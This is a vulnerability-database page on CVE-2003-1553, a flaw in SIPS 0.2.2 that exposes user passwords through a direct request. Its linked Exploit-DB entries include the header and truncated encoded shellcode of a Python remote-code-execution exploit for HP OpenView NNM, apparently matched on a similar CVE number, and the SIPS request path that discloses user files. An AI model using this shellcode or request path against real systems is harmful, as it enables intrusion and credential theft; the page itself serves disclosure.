CVE-2003-1553
published 2003-12-31CVE-2003-1553: Haakon Nilsen Simple Internet Publishing System (SIPS) 0.2.2 stores sensitive information under the web root with insufficient access control, which allows…
PriorityP424medium4.3CVSS 2.0
AVNACMAuNCPINAN
EXPLOIT
EPSS
2.10%
79.4th percentile
Haakon Nilsen Simple Internet Publishing System (SIPS) 0.2.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password and other user information via a direct request to a user-specific configuration directory.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sips | sips | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
exploitdb·2010-07-02·CVSS 10.0
CVE-2010-1553 [CRITICAL] HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution
---
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1553
# Code :
#!/usr/bin/python
import struct
import socket
import httplib
import urllib
# calc.exe Windows Execute Command
sc2 = (
"\x89\xe7\xdb\xc4\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x47\x70\x43\x30\x45\x50\x51\x70\x4f\x79"
"\x4d\x35\x50\x31\x4b\x
Exploit-DB
SIPS 0.2.2 - User Information Disclosure
exploitdb·2003-03-18
CVE-2003-1553 SIPS 0.2.2 - User Information Disclosure
SIPS 0.2.2 - User Information Disclosure
---
source: https://www.securityfocus.com/bid/7134/info
It has been reported that authentication is not required to view user account information. As a result, an unauthorized remote attacker may be able to view potentially sensitive information. This may aid in launching further attacks against a target user or system.
http://www.example.com/[sips_directory]/sipssys/users/[first_letter_of_UserID]/
No writeups or analysis indexed.
http://securityreason.com/securityalert/3780http://www.securityfocus.com/archive/1/315504/30/25460/threadedhttp://www.securityfocus.com/bid/7134https://exchange.xforce.ibmcloud.com/vulnerabilities/11572http://securityreason.com/securityalert/3780http://www.securityfocus.com/archive/1/315504/30/25460/threadedhttp://www.securityfocus.com/bid/7134https://exchange.xforce.ibmcloud.com/vulnerabilities/11572
2003-12-31
Published